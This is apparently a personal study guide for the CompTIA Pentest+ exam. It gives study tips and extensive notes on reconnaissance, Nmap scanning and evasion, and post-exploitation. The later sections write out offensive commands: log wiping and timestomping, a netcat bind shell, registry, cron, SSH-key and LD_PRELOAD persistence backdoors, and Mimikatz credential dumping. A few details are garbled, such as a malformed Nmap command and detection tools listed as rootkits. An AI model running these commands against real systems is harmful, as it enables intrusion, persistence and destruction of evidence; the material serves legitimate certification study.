So, you want to pass the CompTIA Pentest+ (PT0-002) exam? Well, you’re in the right place! I recently tackled this beast and walked away victorious, and now I’m here to share exactly what I did to prepare—so you can do the same!

Step 1: Official Study Materials – Don’t Skip the Basics!

I kicked things off with the official CompTIA book, which covered mostly everything I needed to know. But reading alone isn’t enough, so I made sure to complete:
✅ Performance-Based Questions (PBQs)
✅ Practice Tests
✅ Flashcards
✅ Game Center Activities

These activities helped reinforce the concepts and made the studying process way more engaging. If you’re using the official resources, don’t skip the PBQs! They’re a major part of the exam and test can be challenging.

Step 2: Supplementary Resources – Leveling Up!

While the official materials were good, I found some must-use external resources that helped me grasp the technical concepts even better:

🔥 YouTube Channels & Tutorials

🎥 PwnFunction – Watch all 11 videos (except “Hacking Electron Apps”) for web hacking concepts like XSS and SQL injection.
🎥 SQL Injection Simplified – A simple breakdown of SQL injection techniques.

🌐 Websites for Hands-On Learning

💻 Hacking Tutorials – Netcat – Learn Netcat! Read Parts 1, 2, and 3—they’re short but crucial for understanding networking basics.
💻 HTML Encoding Reference – Memorize special character encodings (!,@,#,$,%, etc.). These show up on the exam!

🔥 TryHackMe – The Real MVP

🔗 TryHackMe – Their Pentest+ learning path is pure gold. It was not necessary to pass but was so helpful for me to get hands on training – I feel this is what helped me cross the finish line!

Step 3: Know Your Tools – Because CompTIA Will Test You!

Something that I can recommend learning is how the following works;

🛠 theHarvester

theharvester -d [domain] -l [number_of_results] -b [source_of_search_query]

🛠 Nslookup

nslookup [ OPTION ] [name | -] [server]

🛠 Dig

dig [ OPTIONS ]

You also need to understand scripting logic. Bash, Python, and PowerShell basics will come in handy—especially knowing control flow structures {[]}() in code snippets.

Step 4: Understand the Pentesting Process

CompTIA loves scenario-based questions that test your understanding of the pentesting lifecycle. Memorizing definitions won’t cut it! Instead, learn what to do before, during, and after a pentest.

📚 CertMaster Learn actually does a great job explaining this. Study it carefully!

Final Tips Before the Exam

🚀 Know Your Tools – The exam objectives outline what is needed
🚀 Think Like a Pentester – Expect real-world scenarios, not simple definition-based questions.
🚀 Get Hands-On – Simulated labs (like TryHackMe) will boost your confidence.

And that’s it! Follow this study plan, and you’ll be more than ready to crush the Pentest+ exam.

My Study Notes 📚

CompTIA Pentesting Process

The structured pentesting process follows a series of steps to ensure a thorough and methodical security assessment.

Planning and Scoping – This is the initial phase where the pentesting team collaborates with stakeholders to establish the rules of engagement, budget, and technical limitations. The team also defines the types of assessments to be conducted and selects specific targets.
Reconnaissance – The goal here is to gather as much information as possible about the target using Open Source Intelligence (OSINT). This includes checking social media, company websites, and other public resources.
Scanning – In this phase, the team identifies active hosts, open ports, and running services within the network. Enumeration is also used to dig deeper into user details, shared resources, and DNS configurations.
Gaining Access – Using the information collected, the team attempts to infiltrate the system. The goal is to determine how far into the network they can go and what sensitive data they can access.
Maintaining Access – Once inside, the team tries to remain undetected while keeping their access open for as long as possible.
Covering Tracks – To avoid detection, the team removes traces of their presence, including logs, executables, and any accounts used during testing.
Analysis – After completing the assessment, the team reviews their findings, evaluates security risks, and prepares a summary of the results.
Reporting – The final step involves presenting the findings and providing recommendations for remediation. The team also outlines a realistic timeline for implementing security improvements.

Throughout the process, ongoing communication with stakeholders is crucial, especially if any unexpected vulnerabilities or potential breaches are discovered.

Understanding CVE and CWE

CVSS (Common Vulnerability Scoring System) – A framework used to rate the severity of security vulnerabilities.
CVE (Common Vulnerabilities and Exposures) – A public database that catalogs known security flaws. Each entry follows a standardized format:
- CVE-[YEAR]-[NUMBER]
- Includes a brief description of the vulnerability (e.g., an SQL injection flaw in a web application).
CWE (Common Weakness Enumeration) – A database maintained by MITRE that categorizes software vulnerabilities.

Footprinting and Intelligence Gathering

DNS records can reveal key details about an organization’s infrastructure. Some important DNS record types include:

MX (Mail Exchange) Record – Identifies the mail server that handles email for a domain.
NS (Name Server) Record – Lists authoritative DNS servers for a domain.
TXT Record – Provides human-readable information about a domain or server.
SRV Record – Specifies services like VoIP or instant messaging.

DNS Query Tools:

Nslookup – A command-line utility available on both Windows and Linux to query domain records.
Dig – A Linux-based tool used for advanced DNS lookups and reverse queries.

Whois Lookups:

A whois search provides details about a domain, such as:

The registered owner’s name and contact details.
The domain’s registrar and status.
Associated name servers.

Due to privacy concerns and regulations like GDPR, some Whois data is now restricted.

Robots.txt File:

Located at https://<domain>/robots.txt, this file guides search engine bots on which pages to crawl or ignore. For example:

Disallow: * /cart – Blocks bots from accessing the cart page.
User-agent: * Disallow: – Allows bots to access all content.

OSINT Tools for Information Gathering

Metagoofil – A Python-based tool that extracts metadata from publicly available documents (PDFs, Word docs, Excel sheets, etc.).

FOCA – A Windows-based OSINT tool that scans for metadata within documents. Requires an SQL server for data storage.

theHarvester – Collects information such as:

Subdomains, email addresses, and employee names.
PGP keys and service banners.
Data from Google, Bing, and social media platforms.

Recon-ng – A modular reconnaissance tool that can conduct Whois lookups, PGP key searches, DNS enumeration, and more.

Maltego – A GUI-based OSINT tool that visualizes relationships between collected data, such as:

People and organizations.
IP addresses and domains.
Social media profiles and public records.

Shodan – A search engine that scans for internet-connected devices, including IoT devices, servers, and industrial control systems. It attempts to log in using default credentials to identify insecure systems.

Preparing for a Vulnerability Scan

Before conducting a vulnerability scan, it’s essential to have a structured approach. This includes defining the scope, identifying assets, obtaining proper authorization, and ensuring compliance with regulations.

Packet Crafting

Packet crafting is the process of creating and manipulating network packets to analyze network behavior, test firewall rules, or simulate attacks. It involves four stages:

Assemble – Create the packet to be sent.
Edit – Modify the contents of a created or captured packet.
Play – Send/resend a packet on the network.
Decode – Capture and analyze traffic using a packet analyzer such as Wireshark.

Popular Packet Crafting Tools

Ostinato – Packet crafting and replaying.
libcrafter – C++ library for crafting network packets.
yersinia – Specialized in exploiting vulnerabilities in network protocols.
packETH – GUI-based packet generator.
Colasoft Packet Builder – GUI-based packet crafting tool.
Bit-Twist – Traffic replay tool.
Scapy – Python-based tool for packet crafting and network testing.
hping3 – Command-line tool for crafting TCP, UDP, and ICMP packets.

Example: Crafting a Custom Packet with hping3

To send a SYN packet to a specific target:

hping3 -S <target IP> -p <port>

Scanning for Logical Vulnerabilities

Logical vulnerabilities exist in misconfigurations, weak authentication, and network exposure. Identifying them requires specialized tools and techniques.

War Driving and Open Access Point Discovery

War driving is the practice of searching for open or misconfigured wireless access points (WAPs). Attackers use this technique to exploit insecure networks.

Tools for Detecting Open WAPs:

Aircrack-ng – Packet capturing, decryption, and analysis.
Kismet – Passive network discovery tool.
Wifite – Automated Wi-Fi auditing tool.

Mapping WAPs Using WiGLE

WiGLE (Wireless Geographic Logging Engine) is an online database that maps and indexes wireless access points. Originally developed to help security professionals locate networks, it has also been used by attackers to find unsecured WAPs.

Analyzing Scanning Results with Nmap

Nmap Features:

Nmap is a powerful network scanning tool that can:

Perform host and service discovery
Conduct OS fingerprinting
Gather MAC addresses
Detect vulnerable hosts

Nmap Timing Options

-T0  # Slowest scan (stealthy, best for IDS evasion)
-T1  # Very slow, useful for avoiding detection
-T2  # Slows scan to conserve bandwidth
-T3  # Default (most stable)
-T4  # Faster, recommended for speed and stability
-T5  # Fastest, but may overwhelm networks

To skip slow hosts due to rate limiting, use:

--host-timeout <time>

TCP vs. UDP Scanning

TCP Scanning Methods

ACK Scan (-sA) – Bypasses firewall rules and detects filtered ports.
TCP Connect Scan (-sT) – Uses a full TCP handshake (less stealthy).
Xmas Tree Scan (-sX) – Sends a TCP segment with FIN, PSH, and URG flags raised to attempt firewall evasion.

UDP Scanning

UDP scanning is slower but essential for discovering open UDP services.

nmap -sU -p <port> <target>

Responses indicate the port’s state:

Open: The target might return a UDP packet.
Closed: The target sends an ICMP port unreachable error (Type 3, Code 3).
Filtered: The target may return “destination unreachable” (Type 3, Codes 1, 2, 9, 10, or 13).

To enhance scanning, combine UDP with version detection (-sV) to identify open ports more accurately.

Automating Scans with Nmap Scripting Engine (NSE)

NSE extends Nmap’s functionality with custom scripts for network discovery, vulnerability detection, and brute-force attacks.

Example:

nmap --script=vuln <target>

To list available scripts in Kali Linux:

ls -al /usr/share/nmap/scripts/

Examples of NSE Scripts:

Running all FTP-related scripts: nmap -p 21 --script "ftp-*" <target>
Running all vulnerability-related scripts: nmap --script=vuln <target>

Detecting Interesting Hosts

During reconnaissance, host discovery methods help gather details about active machines and their services.

Common Discovery Methods:

Ping Scans – Identify live hosts.
TCP Scans – Identify open ports.
OS Footprinting – Determine operating systems.

If firewalls block ICMP pings, alternative methods include:

TCP ACK Ping: nmap -PA <port> <target>
UDP Ping: nmap -PU <port> <target>
SCTP Initiation Ping: nmap -sY <port> <target>
TCP SYN Ping: nmap -PS <target>

To skip host discovery and assume all hosts are online:

nmap -Pn <target>

⚠️ Caution: Using -Pn on large networks may lead to scanning thousands of hosts.

Evaluating DNS Security

DNS vulnerabilities can expose an organization to attacks such as cache poisoning, DNS amplification, and unauthorized zone transfers.

Testing for DNS Vulnerabilities

To discover DNS services:

nmap --script=dns-service-discovery -p 5353 <target>

To check for DNS recursion, use:

nmap --script=dns-recursion <target>

DNS Zone Transfer Attacks

A zone file contains information about a DNS namespace. Misconfigured servers may allow unauthorized transfers, exposing internal host details.

To test for DNS Zone Transfer vulnerability:

nmap --script=dns-zone-transfer -p 53 <target>

If the server is misconfigured, it will return the zone file, revealing internal network details.

Avoiding Detection and Covering Tracks

Nmap & Ways to Evade Detection

Nmap has several methods for stealth scanning, including packet fragmentation and host randomization. Below are some key techniques:

Stealth Option	Example	Description
`-sF`	`nmap -sF www.company.tld`	Sends a TCP FIN packet to bypass non-stateful firewalls.
`-f`	`nmap -f 192.168.1.50`	Splits packets into 8-byte fragments, making them harder for firewalls and IDS to detect.
`--randomize-hosts`	`nmap --randomize-hosts 192.168.1.1-100`	Randomizes the order of scanned hosts to avoid detection.

Using a Decoy

Decoys can make scans appear as if they originate from multiple sources, masking the attacker’s real IP:

bash

CopyEdit

nmap -sS -sV -D RND:3 scanme.nmap.org

Reporting a Fake IP Address

Nmap can spoof source IP addresses to mislead defenders:

bash

CopyEdit

nmap -S www.google.com scanme.nmap.org

Note: The scan may not return results since responses will be sent to the spoofed IP.

Advertising a Fake MAC Address

Changing the MAC address can make scans appear to come from trusted devices:

bash

CopyEdit

nmap -sT --spoof-mac apple scanme.nmap.org

Modifying a Port Number

To make a scan appear as legitimate traffic, use source port manipulation:

bash

CopyEdit

nmap --source-port 53 scanme.nmap.org

Slowing the Scans

IDS tools like Snort can detect rapid scanning. Using Nmap’s timing options can help evade detection:

bash

CopyEdit

nmap -T2 scanme.nmap.org

Bypassing NAC

Network Access Control (NAC) restricts unauthorized access. Attackers often bypass NAC through on-path attacks (Man-in-the-Middle) or by using an authenticated device as a relay.

Living off the Land (LoTL)

Instead of using malware, LoTL techniques exploit built-in OS tools:

PowerShell – Automates system management and execution of malicious scripts.
WMI (Windows Management Instrumentation) – Gathers system information and configures security settings.
Mimikatz – Extracts credentials and exploits Windows authentication mechanisms.

Covering Your Tracks

Clearing Log Entries

Log removal helps attackers stay undetected:

bash

CopyEdit

# Meterpreter command to clear all event logs clearev # Windows CLI: Clear application logs wevtutil cl Application # Linux: Clear syslog echo "" > /var/log/syslog

Removing Specific Entries

To delete only specific log entries instead of wiping the entire log:

bash

CopyEdit

# Example: Remove entries related to a specific user (Linux) sed -i '/backdr/d' /var/log/auth.log

Modifying Timestamps

Changing MACE (Modified, Accessed, Created, Entry Modified) timestamps can mislead forensic investigators:

bash

CopyEdit

# Use Metasploit’s timestomp to modify timestamps meterpreter > timestomp example.txt -m "08/14/2021 10:12:05"

Erasing or Shredding Evidence

Removing History

bash

CopyEdit

# Linux: Clear Bash history export HISTSIZE=0 history -c # Windows: Clear command history Alt+F7

Shredding Files

Secure file deletion ensures traces are removed:

bash

CopyEdit

# Linux: Shred file and overwrite it with zeros shred -zu /root/keylog.bin # Windows: Securely delete a file cipher.exe /w:C:\path\to\file.ext

Standard Steganography Tools

Stegohide

Hides files inside images or audio files:

bash

CopyEdit

steghide embed -cf carrier.jpg -ef secret.txt

OpenStego

A Java-based tool for embedding messages in files and adding digital watermarks.

Netcat and Ncat

Tool	Function
Netcat (nc)	Reads/writes raw data over TCP/UDP, sets up backdoor shells.
Ncat	A more advanced version of Netcat with proxy and encryption support.

Common commands:

bash

CopyEdit

# Start a listener on port 4444 nc -lvp 4444 # Connect to a listener nc <IP> 4444

Remote Management Using WinRM & PSExec

Enabling WinRM

bash

CopyEdit

winrm quickconfig

Using PSExec for Lateral Movement

bash

CopyEdit

psexec \\192.168.1.50 -s "C:\bad-app.exe"

Using a Proxy for Anonymity

ProxyChains4 + Tor

ProxyChains4 routes network traffic through multiple proxies to mask identity.

bash

CopyEdit

nmap --proxies http://192.168.1.30:8008,http://192.168.1.90:8008 scanme.nmap.org

Exploiting the LAN and Cloud

Discovering Services and Shares

Penetration testers need to enumerate network services to identify attack vectors. Below are some common services to look for:

Service	Port	Purpose
File Transfer Protocol (FTP)	TCP 21	Identify FTP servers, versions, and authentication requirements, including anonymous logins.
Simple Mail Transfer Protocol (SMTP)	TCP 25	Extract email addresses, enumerate SMTP servers, and check for open relays.
Domain Name System (DNS)	TCP 53	Perform DNS zone transfers and discover DNS subdomains.
Hypertext Transfer Protocol (HTTP)	TCP 80	Enumerate directories, files, WebDAV features, and software versions.
Server Message Block (SMB)	TCP 139, 445	Retrieve directory information, list and transfer files.

Network Shares:

Windows Hosts: SMB via TCP ports 139/445.
*Linux/_nix Hosts_: NFS via TCP/UDP 2049.

Tools for Enumerating Shares:

Metasploit: Run auxiliary/scanner/smb/smb_enumshares to list SMB shares.
ShareEnum (Sysinternals): GUI tool that scans domains or IP ranges for shares.

Enumerating Websites

Nmap Web Enumeration Scripts

nmap --script=http-enum <target>
nmap --script=http-wordpress-enum <target>
nmap --script=http-webdav-scan <target>

If unsure of the port, scan all ports:

nmap –PN –sT –sV –p0-65535 192.168.1.50

Enumerating Windows Hosts

Command	Purpose
`net view`	View shares on other hosts.
`arp -a`	View ARP cache for local network mapping.
`net user`	List users on the machine.
`ipconfig /displaydns`	Display resolved DNS names.

Enumerating Linux Systems

Command	Purpose
`finger`	View user home directories, login times, and idle times.
`cat /etc/passwd`	List system users.
`uname -a`	Get OS name and kernel version.
`env`	Display environment variables.

Obtaining the Hash

Passing the Hash (PtH)

Attackers steal hashed credentials and reuse them for authentication.
Uses NTLM authentication, meaning no need to crack the hash.
Example: Dumping hashes from LSASS memory, SAM file, or NTDS.dit.

Kerberoasting Attack

Enumerate SPNs (Service Principal Names).
Request service tickets (TGS).
Extract service ticket hash (encrypted with NTLM).
Crack hash offline to retrieve plaintext credentials.

Many service accounts have admin privileges, making this a high-impact attack.

Metasploit Framework

Metasploit organizes its features into six types of modules:

Module	Purpose
Exploit	Delivers payloads for vulnerability exploitation.
Payload	Code executed on the target system.
Post	Post-exploitation actions, such as privilege escalation.
Auxiliary	Scanners, sniffers, spoofers, and other non-exploit features.
Encoders	Obfuscate payloads to avoid detection.
Nops	Maintain payload size consistency.

Metasploit Session Management

# List active Meterpreter sessions
sessions -l

# Interact with session 2
sessions -i 2

# Background a session
Ctrl+Z

Recognizing Other Tools

Tool	Purpose
Impacket	Suite for Windows PenTesting (NTLM relay, Kerberos attacks).
Responder	Poison LLMNR, NetBIOS, and MDNS requests to capture hashes.
mitm6	IPv6 DNS hijacking attack tool.
SearchSploit	Local search engine for Exploit-DB.

Harvesting Credentials

Technique	Description
SAM file extraction	Dump hashed passwords or copy via Volume Shadow Service (VSS).
UAC bypass	Bypass User Account Control using process injection.
DLL hijacking	Replace legitimate DLLs with malicious ones.
Writable services	Modify startup services to execute malicious payloads.
Unquoted service paths	Inject malicious executables into service startup locations.

Searching for Local Privilege Escalation Exploits in Metasploit

search exploit/windows/local -S Escalation

Denying Service (DoS Attacks)

Attack Type	Description	Tools
Packet Flood	Sends massive amounts of TCP, UDP, or ICMP packets to overwhelm target.	hping3, LOIC
SYN Flood	Sends many TCP SYN requests without completing handshakes.	Metasploit
Slowloris	Maintains long-lived HTTP connections to exhaust server resources.	Slowloris, RUDY
NTP Amplification	Spoofs NTP queries to reflect and amplify attack traffic.	NTPDos, Saddam
DNS Amplification	Spoofs DNS queries to amplify attack traffic.	Hyenae
HTTP Flood	Sends large volumes of HTTP requests to exhaust web server resources.	HOIC, LOIC

Wireless Attacks and Security Auditing Tools

Wireless networks are a prime target for attackers due to their widespread use and potential security vulnerabilities. Understanding the various Wi-Fi security protocols and the tools available for auditing wireless networks is essential for cybersecurity professionals. This guide explores different WPA protocols, Wi-Fi penetration testing tools, Bluetooth security, and key recovery techniques.

Understanding WPA Security

WPA (Wi-Fi Protected Access)

Uses Temporal Key Integrity Protocol (TKIP), which dynamically generates a 128-bit key per packet.
Includes Message Integrity Check (MIC) for stronger data integrity compared to CRC.

WPA2

Improves upon WPA by replacing RC4 and TKIP with CCMP (Counter Mode CBC-MAC Protocol) based on AES encryption.

WPA3

Introduces 192-bit encryption in WPA3-Enterprise mode for stronger security.
Implements 48-bit Initialization Vectors (IVs) and Protected Management Frames (PMFs) to secure management traffic.

Wireless Network Monitoring and Attacks

Aircrack-ng Suite

The Aircrack-ng suite is widely used for wireless network security testing, offering several command-line tools:

Airmon-ng – Enables or disables monitor mode on a wireless interface.
Airodump-ng – Captures 802.11 frames to identify access points and connected client devices.
Aireplay-ng – Injects frames to perform attacks, including deauthentication attacks to capture authentication credentials.

Kismet: Wireless Intrusion Detection and Packet Capture

Captures and analyzes wireless traffic.
Detects hidden SSIDs and preserves handshake packets for later password cracking.
Supports Wi-Fi, Bluetooth, and SDR (Software Defined Radio) devices.
Can be deployed on Wi-Fi Pineapple for remote monitoring.

Wifite2: Automated Wi-Fi Attacking Tool

Wifite2 automates Wi-Fi network auditing by scanning, identifying vulnerabilities, and launching attacks such as:

WPS brute-force PIN attack (online)
WPS Pixie Dust attack (offline)
WPA handshake capture and offline cracking
PMKID attack for WPA key retrieval

Wifite2 prioritizes the easiest targets first and avoids spending excessive time on unsuccessful attacks.

Bluetooth Security: Spooftooph

Spooftooph is a tool for spoofing and cloning Bluetooth devices. It enables users to:

Modify or generate a Bluetooth name, class, and address.
Scan for in-range devices and clone their identities.
Randomly switch between cloned devices at timed intervals.
Output scan results for later use.

Recovering Wireless Keys

Cracking Wi-Fi passwords often requires a large wordlist for brute-force attempts. One of the most commonly used wordlists is Rockyou.txt, which can be found on GitHub.

Graphical Wireless Auditing: Fern

Fern is a Python-based wireless security tool that automates Wi-Fi cracking using:

Brute force and dictionary attacks
Session hijacking
Replay and MITM attacks

Dependencies Required for Fern:

Python
Aircrack-ng
Macchanger

Fern is available in both free and commercial versions, with limited features in the free version.

Attacking WPA2-Enterprise with EAPHammer

EAPHammer is a Python-based toolkit for attacking WPA2-Enterprise networks. It enables:

Evil twin (karma) attacks to trick users into connecting to a rogue AP.
RADIUS credential theft (WPA-EAP and WPA2-EAP authentication attacks).
SSID cloaking and captive portal attacks to steal Active Directory credentials.

Dependencies Required for EAPHammer:

Apache2
Dnsmasq
Libssl-dev
TLS certificates

Wi-Fi Attack Framework: MDK4

MDK4 is a Linux-based tool offering multiple attack modules, including:

Mode b – Creates fake SSIDs to confuse users.
Mode a – Authentication DoS attack to flood the AP with authentication requests.
Mode p – SSID probing and brute-forcing hidden SSIDs.
Mode d – Deauthentication attack to disconnect all clients.
Mode w – IDS/IPS confusion attacks to evade detection.

⚠️ Warning: Some MDK4 attacks can severely disrupt networks. Use with caution during testing.

Targeting Mobile Devices

Mobile Device Deployment Models

Organizations implement different deployment models for managing mobile devices securely:

Bring Your Own Device (BYOD) – Employees use personal devices for work but must comply with corporate security policies (e.g., OS version, functionality).
Corporate Owned, Business Only (COBO) – Company-owned devices strictly used for work-related tasks.
Corporate Owned, Personally Enabled (COPE) – Company-owned devices that allow limited personal use, subject to acceptable use policies.
Choose Your Own Device (CYOD) – Employees select from a curated list of company-approved devices.

Common Mobile Device Attacks

Mobile devices are frequently targeted due to their constant connectivity and widespread use. Common mobile threats include:

Spyware – Records keystrokes and activity, transmitting data to an attacker’s server.
Trojans – Malicious apps disguised as legitimate software, often allowing remote access.
Rootkits – Establish a backdoor for persistent, unauthorized access.
Viruses – Self-replicating malware requiring a propagation mechanism (e.g., infected files or apps).
Worms – A subclass of viruses that spread independently without requiring a host file.

Attacking Specialized Systems: Virtual Environments

Virtual Environment Components

Virtualization allows multiple operating systems to run on a single physical machine. Key components include:

Host Hardware – The physical system supporting virtualized instances.
Hypervisor (Virtual Machine Monitor, VMM) – Manages virtual machines and hardware interactions.
Guest Operating Systems (VMs) – Virtualized OS instances running on the hypervisor.

Virtual Environment Attack Classes

Virtualized environments introduce unique attack vectors, categorized as:

Class 1 – External attacks targeting the virtual infrastructure.
Class 2 – Direct attacks against virtual machines.
Class 3 – Attacks originating from within a virtual machine.

Web Application-Based Attacks

Web applications are a primary target for attackers, making security assessments essential. The OWASP Top 10 lists the most critical web application vulnerabilities:

OWASP Top 10 Vulnerabilities (2021)

Broken Access Control – Improperly enforced access restrictions.
Cryptographic Failures – Weak or improper use of encryption.
Injection – SQL, LDAP, and command injections exploiting input validation flaws.
Insecure Design – Poor security planning in application architecture.
Security Misconfiguration – Default settings or exposed sensitive data.
Vulnerable and Outdated Components – Using outdated libraries and dependencies.
Identification and Authentication Failures – Weak authentication mechanisms.
Software and Data Integrity Failures – Exploiting unverified updates and dependencies.
Security Logging and Monitoring Failures – Lack of proper event logging.
Server-Side Request Forgery (SSRF) – Manipulating server-side requests.

Common Web Exploits

Lightweight Directory Access Protocol (LDAP) Attacks

LDAP is used to store and manage user credentials.
LDAP Injection occurs when an attacker manipulates LDAP queries to gain unauthorized access.

Cross-Site Scripting (XSS) Attacks

XSS attacks exploit how web browsers handle scripts, often bypassing security policies.
Three main types include:

Persistent XSS – Injected malicious scripts stored on a website (e.g., in a forum or database).
Reflected XSS – Malicious scripts embedded in URLs sent to victims.
DOM-Based XSS – Client-side scripts modify the browser’s Document Object Model (DOM) to execute attacks.

⚠️ Warning: Persistent XSS can impact users beyond the original attack scope, particularly in third-party or cloud-hosted applications.

Web Application Security Tools

Security professionals rely on various tools to identify vulnerabilities in web applications:

Tool	Description
truffleHog	Searches Git repositories for exposed secrets (e.g., API keys, passwords).
OWASP ZAP (Zed Attack Proxy)	Proxy tool for automated and manual web vulnerability testing.
Burp Suite Community Edition	Web security proxy used for penetration testing, request manipulation, and scanning.
Gobuster	Brute-force tool for discovering directories, files, and subdomains.
DirBuster	Finds hidden directories and files on web servers using brute-force techniques.
w3af	Web vulnerability scanning and exploitation framework (SQL injection, XSS, etc.).
Wapiti	Web application scanner that navigates sites to find vulnerabilities like injection flaws.
BeEF (Browser Exploitation Framework)	Assesses browser security using client-side attack vectors.
WPScan (WordPress Security Scanner)	Scans WordPress sites for vulnerabilities in themes, plugins, and configurations.
Brakeman	Static code analysis tool for identifying security flaws in Ruby on Rails applications.
SQLmap	Automates SQL injection attacks, database enumeration, and exploitation.
SearchSploit	Searches Exploit-DB for known vulnerabilities, supports Nmap scan outputs for automated exploit searches.
CrackMapExec	Post-exploitation tool for assessing Active Directory environments.

Performing System Hacking

Discovering Tools for System Hacking

Various tools are used in post-exploitation to maintain access, execute commands, and further compromise systems. Below are some of the key tools used in system hacking:

Command and Control (C2) Frameworks

C2 frameworks allow an attacker to control compromised machines remotely.

Empire – A C2 framework that leverages PowerShell for post-exploitation on Windows. It also includes a Python component for Linux.
Covenant – A .NET-based C2 framework that highlights attack vectors in .NET applications. It supports cross-platform operations on Windows, Linux, and macOS.
- GitHub: https://github.com/cobbr/Covenant
Mythic – Another cross-platform C2 framework, particularly effective for macOS penetration testing. It supports payloads like Apfell and Poseidon.
- GitHub: https://github.com/its-a-feature/Mythic

PowerShell Exploitation Tools

PowerShell-based post-exploitation tools enable attackers to execute commands and scripts stealthily.

Nishang – A collection of PowerShell scripts for penetration testing and post-exploitation.
- GitHub: https://github.com/samratashok/nishang
NoPowerShell – Enables PowerShell-like functionality without invoking powershell.exe, reducing detection risks.
- GitHub: https://github.com/bitsadmin/nopowershell
PowerLessShell – Executes PowerShell commands without calling powershell.exe, improving stealth.
- GitHub: https://github.com/Mr-Un1k0d3r/PowerLessShell
PowerShdll – Uses DLL files to run PowerShell commands without invoking powershell.exe.
- GitHub: https://github.com/p3nt4/PowerShdll

Exploring With Netcat

Netcat (nc) is a versatile command-line tool used for reading and writing data across network connections.

Basic Syntax

bash

CopyEdit

nc [options] [target address] [port(s)]

Common Netcat Options

Option	Description
`-l`	Starts Netcat in listen mode. Default is client mode.
`-u`	Starts Netcat in UDP mode instead of TCP.
`-p`	Specifies the port for listening mode or sets the source port in client mode.
`-e`	Executes a program upon connection.
`-n`	Prevents DNS lookups for hostnames.
`-z`	Sends a packet without a payload (useful for port scanning).
`-w <seconds>`	Sets a timeout value for connections.
`-v`	Enables verbose mode.
`-vv`	Enables very verbose mode.

Example Usage

Creating a Backdoor Listener: bash CopyEdit nc -lp 4444 -e /bin/bash This command listens on port 4444 and spawns a bash shell upon connection.
Connecting to the Backdoor: bash CopyEdit nc <target IP> 4444

Summarizing Remote Access Tools

These tools facilitate remote access to systems for both legitimate administration and unauthorized intrusion.

Service	Description	Example Command
Telnet	An unencrypted remote login protocol, now largely deprecated.	`telnet 192.168.1.50 12345`
rsh/rlogin	A Linux remote shell command that may allow login without credentials if `.rhosts` is configured insecurely.	`rlogin 192.168.1.50`
Netcat	A lightweight networking utility for reading and writing data over TCP/UDP.	`nc -lp 4444 -e /bin/bash`
Ncat	A more advanced version of Netcat with encryption and additional features.	`Ncat 192.168.1.50 4444 -e cmd.exe`
SSH (Secure Shell)	A secure protocol for remote access, commonly used in Linux environments.	`ssh admin@192.168.1.50`

Disassembler and Debugger Tools

Reverse engineering requires disassemblers and debuggers to analyze compiled code.

Tool	Description
OllyDbg	A debugger included in Kali Linux for analyzing 32-bit Windows applications.
Immunity Debugger	A powerful debugger supporting Python scripting for runtime analysis.
GNU Debugger (GDB)	A widely used open-source debugger for Unix, Windows, and macOS.
WinDbg	A Microsoft-developed debugger for Windows systems.
IDA (Interactive Disassembler)	A commercial-grade disassembler and debugging tool (free version available).
Ghidra	An open-source reverse engineering tool developed by the NSA, featuring a built-in disassembler and decompiler.
Covenant	A .NET-based penetration testing framework with debugging and development capabilities.

Maintaining Access – Persistence Techniques

Once an attacker has compromised a system, maintaining access is crucial for prolonged exploitation, further lateral movement, or executing additional attacks. The goal is to establish persistence so that access is not lost after a reboot or user action. Attackers use various techniques to accomplish this across Windows and Linux systems.

Windows Persistence Techniques

Windows offers multiple methods for maintaining persistence, either by modifying the operating system, leveraging built-in services, or using third-party applications.

Persistence Method	Description	Tools/Techniques
Registry Run Keys & Startup Items	Attackers modify Windows Registry keys to execute malicious code on startup.	`reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\backdoor.exe" /f` Autoruns from Sysinternals (https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns)
Scheduled Tasks	Malicious programs can be set to execute automatically using scheduled tasks.	`schtasks /create /tn "PersistenceTask" /tr "C:\malware.exe" /sc onlogon /ru SYSTEM` Metasploit module: `exploit/windows/local/persistence`
WMI Event Subscription	Windows Management Instrumentation (WMI) allows for event-based persistence, where an attacker creates an event filter that triggers execution.	`wmic /namespace:\\root\subscription PATH __EventFilter CREATE Name="EvilEvent", Query="SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_Process'", QueryLanguage="WQL"`
DLL Hijacking	If an application loads a DLL without specifying its full path, an attacker can replace it with a malicious DLL.	Metasploit module: `exploit/windows/local/trusted_service_path` `https://itm4n.github.io/windows-dll-hijacking-clarified/`
LSASS Credential Dumping	The Local Security Authority Subsystem Service (LSASS) stores login credentials in memory, which attackers can extract.	Mimikatz: `sekurlsa::logonpasswords` Metasploit: `post/windows/gather/credentials/lsass_hashdump`
Boot or Logon Autostart Execution	Attackers leverage various Windows startup mechanisms, such as Group Policy Objects (GPOs) or Service DLLs.	GPO Abuse (`gpedit.msc`) Service DLL Injection (`sc config`)
Abusing Userinit	The `Userinit` registry key controls what runs after user authentication. Attackers modify it to launch malicious scripts or binaries.	`reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "malicious.exe" /f`
Lateral Movement via Pass-the-Hash or Pass-the-Ticket	Attackers reuse stolen hashes or Kerberos tickets to authenticate to remote systems without knowing the actual password.	Mimikatz: `sekurlsa::pth /user:Administrator /domain:corp.com /ntlm:<hash>` Impacket: `pth-winexe -U Administrator%HASH //target cmd.exe`

Metasploit Persistence Modules for Windows

Metasploit provides various modules that can be used to establish persistence:

post/windows/manage/persistence_exe – Installs an executable for persistence.
post/windows/manage/enable_rdp – Enables Remote Desktop Protocol (RDP) access.
exploit/windows/local/always_install_elevated – Abuses Windows Installer permissions.

Linux Persistence Techniques

Persistence in Linux is achieved by modifying system files, creating cron jobs, or planting rootkits.

Persistence Method	Description	Tools/Techniques
Cron Jobs	Attackers schedule malicious scripts to run periodically.	`echo "/5 * * * /tmp/backdoor.sh" >> /etc/crontab`
SSH Backdoors	Attackers add their SSH keys to a compromised system.	`echo "ssh-rsa AAAAB3..." >> ~/.ssh/authorized_keys`
Modifying System Startup Scripts	Scripts in `/etc/init.d/`, `/etc/rc.local`, or `~/.bashrc` can be altered for persistence.	`echo "/usr/bin/malware &" >> ~/.bashrc`
LD_PRELOAD Hijacking	Attackers manipulate shared libraries to execute code whenever a program runs.	`echo "/tmp/malicious.so" > /etc/ld.so.preload`
Kernel Rootkits	Advanced attackers use rootkits to hide processes, files, or network connections.	Examples: `rkthunter`, `chkrootkit`, Rootkits: Azazel, Jynx2
